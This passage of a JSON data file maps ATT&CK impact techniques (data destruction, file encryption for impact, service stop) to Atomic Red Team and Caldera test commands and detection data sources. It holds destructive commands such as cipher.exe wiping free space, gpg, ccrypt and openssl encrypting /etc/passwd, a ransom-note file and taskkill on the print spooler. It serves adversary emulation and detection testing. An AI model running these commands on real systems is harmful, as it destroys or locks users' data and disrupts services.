"name": "Overwrite deleted data on C drive", + "auto_generated_guid": "321fd25e-0007-417f-adec-33232252be19", + "description": "RansomEXX malware removes all deleted files using windows built-in cipher.exe to prevent forensic recover.\nThis process is very slow and test execution may timeout. \nhttps://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware\nhttps://support.microsoft.com/en-us/topic/cipher-exe-security-tool-for-the-encrypting-file-system-56c85edd-85cf-ac07-f2f7-ca2d35dab7e4\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "cipher.exe /w:C:\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": 
"thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image deletion", + "description": "An image was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "image" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance deletion", + "description": "An instance was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance deletion", + "description": "An instance was deleted.", + "source_data_element": "user", + "relationship": "terminated", + "target_data_element": "instance" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot deletion", + "description": "A snapshot was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "snapshot" + }, + { + "data_source": "cloud storage", 
+ "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage deletion", + "description": "A cloud storage was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "cloud storage bucket" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage deletion", + "description": "A cloud storage was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "cloud storage object" + }, + { + "data_source": "volume", + "definition": "Information associated with accessible storage areas with a single file system.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "Windows", + "Linux", + "macOS" + ], + "data_component": "volume deletion", + "description": "A volume was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "volume" + } + ], + "external_reference": [ + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + 
"https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ], + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + ], + [ + "https://aws.amazon.com/s3/", + "https://azure.microsoft.com/en-us/services/storage/blobs/", + "https://cloud.google.com/storage" + ] + ] + }, + { + "technique_id": "T1486", + "command_list": [ + "echo \"passwd\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}\n", + "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o /tmp/passwd.gpg -c #{input_file_path}\n", + "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c /etc/passwd\n", + "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo AES-256 -o #{encrypted_file_path} -c #{input_file_path}\n", + "$which_7z a -ppasswd #{encrypted_file_path} #{input_file_path}\n", + "$which_7z a -p#{pwd_for_encrypted_file} /tmp/passwd.zip #{input_file_path}\n", + "$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} /etc/passwd\n", + "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi\n", + "if [[ $USER == \"root\" ]]; then $which_ccencrypt /etc/passwd; file /etc/passwd.cpt; #{impact_command}; 
else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi\n", + "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt ~/.bash_history; file ~/.bash_history.cpt; #{impact_command}; fi\n", + "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; sudo su; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; sudo su; fi\n", + "$which_openssl genrsa -out /tmp/key.pem #{encryption_bit_size}\n$which_openssl rsa -in /tmp/key.pem -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}\n", + "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out /tmp/pub.pem\n$which_openssl rsautl -encrypt -inkey /tmp/pub.pem -pubin -in #{input_file_path} -out #{encrypted_file_path}\n", + null, + "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out /tmp/passwd.zip\n", + "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in /etc/passwd -out #{encrypted_file_path}\n", + "echo T1486 - Purelocker Ransom Note > %USERPROFILE%\\Desktop\\YOUR_FILES.txt\n" + ], + "commands": [ + { + "command": "echo \"passwd\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "echo 
\"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o /tmp/passwd.gpg -c #{input_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c /etc/passwd\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo AES-256 -o #{encrypted_file_path} -c #{input_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_7z a -ppasswd #{encrypted_file_path} #{input_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_7z a -p#{pwd_for_encrypted_file} /tmp/passwd.zip #{input_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} /etc/passwd\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "if [[ $USER == \"root\" ]]; then $which_ccencrypt /etc/passwd; file /etc/passwd.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; 
fi\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt ~/.bash_history; file ~/.bash_history.cpt; #{impact_command}; fi\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; sudo su; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; sudo su; fi\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_openssl genrsa -out /tmp/key.pem #{encryption_bit_size}\n$which_openssl rsa -in /tmp/key.pem -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out /tmp/pub.pem\n$which_openssl rsautl -encrypt -inkey /tmp/pub.pem -pubin -in #{input_file_path} -out #{encrypted_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": null, + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out /tmp/passwd.zip\n", + "source": "atomics/T1486/T1486.yaml", + 
"name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in /etc/passwd -out #{encrypted_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "echo T1486 - Purelocker Ransom Note > %USERPROFILE%\\Desktop\\YOUR_FILES.txt\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1486", + "display_name": "Data Encrypted for Impact", + "atomic_tests": [ + { + "name": "Encrypt files using gpg (Linux)", + "auto_generated_guid": "7b8ce084-3922-4618-8d22-95f996173765", + "description": "Uses gpg to encrypt a file\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "pwd_for_encrypted_file": { + "description": "the password that you want for the encrypted file", + "type": "String", + "default": "passwd" + }, + "encrypted_file_path": { + "description": "path to the encrypted file", + "type": "Path", + "default": "/tmp/passwd.gpg" + }, + "input_file_path": { + "description": "path to the file that you want to encrypt", + "type": "Path", + "default": "/etc/passwd" + }, + "encryption_alg": { + "description": "encryption algorithm of the file", + "type": "String", + "default": "AES-256" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Finds where gpg is located\n", + "prereq_command": "which_gpg=`which gpg`\n", + "get_prereq_command": "(which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch 
--yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}\n", + "cleanup_command": "rm #{encrypted_file_path}\n" + } + }, + { + "name": "Encrypt files using 7z (Linux)", + "auto_generated_guid": "53e6735a-4727-44cc-b35b-237682a151ad", + "description": "Uses 7z to encrypt a file\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "pwd_for_encrypted_file": { + "description": "the password that you want for the encrypted file", + "type": "String", + "default": "passwd" + }, + "encrypted_file_path": { + "description": "path to the encrypted file", + "type": "Path", + "default": "/tmp/passwd.zip" + }, + "input_file_path": { + "description": "path to the file that you want to encrypt", + "type": "Path", + "default": "/etc/passwd" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Finds where 7z is located\n", + "prereq_command": "which_7z=`which 7z`\n", + "get_prereq_command": "" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}\n", + "cleanup_command": "$which_7z e #{encrypted_file_path}\nrm #{encrypted_file_path}\n" + } + }, + { + "name": "Encrypt files using ccrypt (Linux)", + "auto_generated_guid": "08cbf59f-85da-4369-a5f4-049cffd7709f", + "description": "Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. 
If root permissions are not available then attempts to encrypt data within user's home directory.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "cped_file_path": { + "description": "path where you want your copied file to be", + "type": "Path", + "default": "/tmp/passwd" + }, + "root_input_file_path": { + "description": "path to the file that you want to be encrypted if you are root user", + "type": "Path", + "default": "/etc/passwd" + }, + "user_input_file_path": { + "description": "path to file that you want to be encrypted if you are normal user", + "type": "Path", + "default": "~/.bash_history" + }, + "impact_command": { + "description": "command to show impact of encryption", + "type": "String", + "default": "sudo su" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Finds where ccencrypt and ccdecrypt is located and copies input file\n", + "prereq_command": "which_ccencrypt=`which ccencrypt`\nwhich_ccdecrypt=`which ccdecrypt`\nif [[ $USER == \"root\" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi\n", + "get_prereq_command": "(which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi\n", + "cleanup_command": "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" + } + }, + { + "name": "Encrypt files using openssl (Linux)", + "auto_generated_guid": "142752dc-ca71-443b-9359-cf6f497315f1", + "description": "Uses openssl to encrypt a file\n", + "supported_platforms": [ + 
"linux" + ], + "input_arguments": { + "private_key_path": { + "description": "path to the private key", + "type": "Path", + "default": "/tmp/key.pem" + }, + "public_key_path": { + "description": "path to the public key", + "type": "Path", + "default": "/tmp/pub.pem" + }, + "encryption_bit_size": { + "description": "size of the bit of encryption", + "type": "Integer", + "default": 2048 + }, + "encrypted_file_path": { + "description": "path to the encrypted file", + "type": "Path", + "default": "/tmp/passwd.zip" + }, + "input_file_path": { + "description": "path to the file that you want to encrypt", + "type": "Path", + "default": "/etc/passwd" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Finds where openssl is located\n", + "prereq_command": "which_openssl=`which openssl`\n", + "get_prereq_command": "" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}\n", + "cleanup_command": "$which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}\nrm #{encrypted_file_path}\n" + } + }, + { + "name": "PureLocker Ransom Note", + "auto_generated_guid": "649349c7-9abf-493b-a7a2-b1aa4d141528", + "description": "building the IOC (YOUR_FILES.txt) for the PureLocker ransomware \nhttps://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "echo T1486 - Purelocker Ransom Note > %USERPROFILE%\\Desktop\\YOUR_FILES.txt\n", + "cleanup_command": "del %USERPROFILE%\\Desktop\\YOUR_FILES.txt >nul 2>&1\n" + } + } + ] + } + ], + "queries": [], + 
"possible_detections": [ + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage metadata", + "description": "Data and information that describe a cloud storage and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "cloud storage" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage modification", + "description": "A cloud storage was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "cloud storage bucket" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage modification", + "description": "A cloud storage was modified.", + "source_data_element": "modified", + "relationship": "created", + "target_data_element": "cloud storage object" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], 
+ "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://content.fireeye.com/apt/rpt-apt38", + [ + "https://aws.amazon.com/s3/", + "https://azure.microsoft.com/en-us/services/storage/blobs/", + "https://cloud.google.com/storage" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1489", + "command_list": [ + "sc.exe stop spooler\n", + "net.exe stop spooler\n", + "taskkill.exe /f /im spoolsv.exe\n", + "quit app \"Microsoft Outlook.app\"" + ], + "commands": [ + { + "command": "sc.exe stop spooler\n", + "source": "atomics/T1489/T1489.yaml", + "name": "Atomic Red Team Test - Service Stop" + }, + { + "command": "net.exe stop spooler\n", + "source": "atomics/T1489/T1489.yaml", + "name": "Atomic Red Team Test - Service Stop" + }, + { + "command": "taskkill.exe /f /im spoolsv.exe\n", + "source": "atomics/T1489/T1489.yaml", + "name": "Atomic Red Team Test - Service Stop" + }, + { + "command": "quit app \"Microsoft Outlook.app\"", + "source": "data/abilities/impact/3b007f46-23e7-4a11-9c14-e7085b6a754a.yml", + "name": "Quit Outlook" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1489", 
+ "display_name": "Service Stop", + "atomic_tests": [ + { + "name": "Windows - Stop service using Service Controller", + "auto_generated_guid": "21dfb440-830d-4c86-a3e5-2a491d5a8d04", + "description": "Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying\nit has changed to a state of STOP_PENDING. If the spooler service was not running \"The service has not been started.\" will be displayed and it can be\nstarted by running the cleanup command.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "service_name": { + "description": "Name of a service to stop", + "type": "String", + "default": "spooler" + } + }, + "executor": { + "command": "sc.exe stop #{service_name}\n", + "cleanup_command": "sc.exe start #{service_name} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - Stop service using net.exe", + "auto_generated_guid": "41274289-ec9c-4213-bea4-e43c4aa57954", + "description": "Stops a specified service using the net.exe command. Upon execution, if the service was running \"The Print Spooler service was stopped successfully.\"\nwill be displayed. If the service was not running, \"The Print Spooler service is not started.\" will be displayed and it can be\nstarted by running the cleanup command.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "service_name": { + "description": "Name of a service to stop", + "type": "String", + "default": "spooler" + } + }, + "executor": { + "command": "net.exe stop #{service_name}\n", + "cleanup_command": "net.exe start #{service_name} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - Stop service by killing process", + "auto_generated_guid": "f3191b84-c38b-400b-867e-3a217a27795f", + "description": "Stops a specified service killng the service's process.\nThis technique was used by WannaCry. 
Upon execution, if the spoolsv service was running \"SUCCESS: The process \"spoolsv.exe\" with PID 2316 has been terminated.\"\nwill be displayed. If the service was not running \"ERROR: The process \"spoolsv.exe\" not found.\" will be displayed and it can be\nstarted by running the cleanup command.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "process_name": { + "description": "Name of a process to kill", + "type": "String", + "default": "spoolsv.exe" + } + }, + "executor": { + "command": "taskkill.exe /f /im #{process_name}\n", + "name": "command_prompt" + } + } + ] + }, + { + "id": "3b007f46-23e7-4a11-9c14-e7085b6a754a", + "name": "Quit Outlook", + "description": "Quit Outlook", + "tactic": "impact", + "technique": { + "attack_id": "T1489", + "name": "Service Stop" + }, + "platforms": { + "darwin": { + "osa": { + "command": "quit app \"Microsoft Outlook.app\"" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + 
